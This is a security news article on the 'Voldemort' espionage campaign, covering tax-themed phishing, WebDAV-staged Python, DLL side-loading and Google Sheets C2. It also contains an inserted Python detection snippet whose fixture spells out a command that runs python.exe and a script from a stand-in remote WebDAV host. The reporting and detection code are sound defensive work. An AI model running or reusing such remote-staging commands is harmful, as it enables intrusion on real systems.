Cybersecurity researchers have uncovered a novel malware campaign that leverages Google Sheets as a command-and-control (C2) mechanism.
The activity, detected by Proofpoint beginning August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the goal of targeting more than 70 organizations worldwide by means of a bespoke tool referred to as Voldemort that is equipped to gather information and deliver additional payloads.
Targeted sectors include insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.
The suspected cyber espionage campaign has not been attributed to a specific named threat actor. As many as 20,000 email messages have been sent as part of the attacks.
These emails claim to be from tax authorities in the U.S., the U.K., France, Germany, Italy, India, and Japan, alerting recipients about changes to their tax filings and urging them to click on Google AMP Cache URLs that redirect users to an intermediate landing page.
The landing page checks the User-Agent string to determine whether the operating system is Windows and, if so, leverages the search-ms: URI protocol handler to display a Windows shortcut (LNK) file that uses an Adobe Acrobat Reader icon to masquerade as a PDF file in an attempt to trick the victim into launching it.
“If the LNK is executed, it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (library), passing a Python script on a fourth share (resource) on the same host as an argument,” Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson said.
“This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share.”
The Python script is designed to gather system information and send the data in the form of a Base64-encoded string to an actor-controlled domain, after which it displays a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive.
The ZIP archive, for its part, contains two files: a legitimate executable, “CiscoCollabHost.exe,” that is susceptible to DLL side-loading, and a malicious DLL, “CiscoSparkLauncher.dll” (i.e., Voldemort), that is sideloaded by it.
Voldemort is a custom backdoor written in C that comes with capabilities for information gathering and loading next-stage payloads, with the malware using Google Sheets for C2, data exfiltration, and executing commands from the operators.
Proofpoint described the activity as aligned with advanced persistent threats (APT) but carrying “cybercrime vibes” owing to the use of techniques popular in the e-crime landscape.
“Threat actors abuse file schema URIs to access external file sharing resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is done by using the schema ‘file://’ and pointing to a remote server hosting the malicious content,” the researchers said.
This approach has become increasingly prevalent among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
Furthermore, Proofpoint said it was able to read the contents of the Google Sheet, identifying a total of six victims, including one that is believed to be either a sandbox or a “known researcher.”
The campaign has been branded unusual, raising the possibility that the threat actors cast a wide net before zeroing in on a small pool of targets. It is also possible that the attackers, likely with varying levels of technical expertise, planned to infect several organizations.
“While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives,” the researchers said.
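The two staging tricks described above (PowerShell launching python.exe and its script straight from remote WebDAV shares, and search-ms:/file:// URIs pointing at external hosts) both leave a concrete artifact a defender can match on: a UNC path to a non-local host. The following is an added detection example written for this article, not Proofpoint's or Netskope's code; the Sysmon-style process events, the interpreter list and the host names are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Interpreters whose execution from (or with arguments on) a remote share is worth alerting on.
# Assumption: this list is chosen for the example, tune it to your environment.
INTERPRETERS = {"python.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# UNC paths such as \\host\share\file or WebDAV-style \\host@ssl\DavWWWRoot\file
UNC_RE = re.compile(r'\\\\[\w.\-@]+\\[^\s"\']+')
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}

def remote_paths(text):
    """Return the distinct UNC paths found in a command line or image path."""
    return list(dict.fromkeys(UNC_RE.findall(text)))

def suspicious_process(event):
    """Flag a process-creation event whose image or arguments live on a remote share
    and whose image or parent is a scripting interpreter. Returns a finding or None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    paths = remote_paths(event["Image"] + " " + event["CommandLine"])
    if paths and (image in INTERPRETERS or parent in INTERPRETERS):
        return {"image": image, "parent": parent, "remote_paths": paths}
    return None

def remote_uri(uri):
    """True when a file:// or search-ms: URI resolves to a host other than the local machine."""
    scheme, _, rest = uri.partition(":")
    if scheme.lower() == "file":
        return (urlparse(uri).hostname or "") not in LOCAL_HOSTS
    if scheme.lower() == "search-ms":
        # search-ms carries its search root in crumb=location:<path>; a UNC root is a remote share
        crumbs = parse_qs(rest.lstrip("/?")).get("crumb", [])
        return any(c.lower().startswith("location:\\\\") for c in crumbs)
    return False

# Constructed events mimicking Sysmon Event ID 1 fields (hosts use the reserved .example TLD)
STAGED_FROM_WEBDAV = {
    "Image": r"\\webdav.example@ssl\library\python.exe",
    "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": r'"\\webdav.example@ssl\library\python.exe" "\\webdav.example@ssl\resource\start.py"',
}
LOCAL_PYTHON = {
    "Image": r"C:\Python312\python.exe",
    "ParentImage": r"C:\Windows\explorer.exe",
    "CommandLine": r'"C:\Python312\python.exe" C:\Users\alice\report.py',
}
```

The UNC match alone is noisy on networks with ordinary file servers, so the finding is gated on an interpreter being the image or the parent; a file share opened by Excel from Explorer is deliberately not flagged.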
“The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign.”
The development comes as Netskope Threat Labs uncovered an updated version of Latrodectus (version 1.4) that comes with a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.
“Latrodectus has been evolving pretty fast, adding new features to its payload,” security researcher Leandro Fróes said. “The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants.”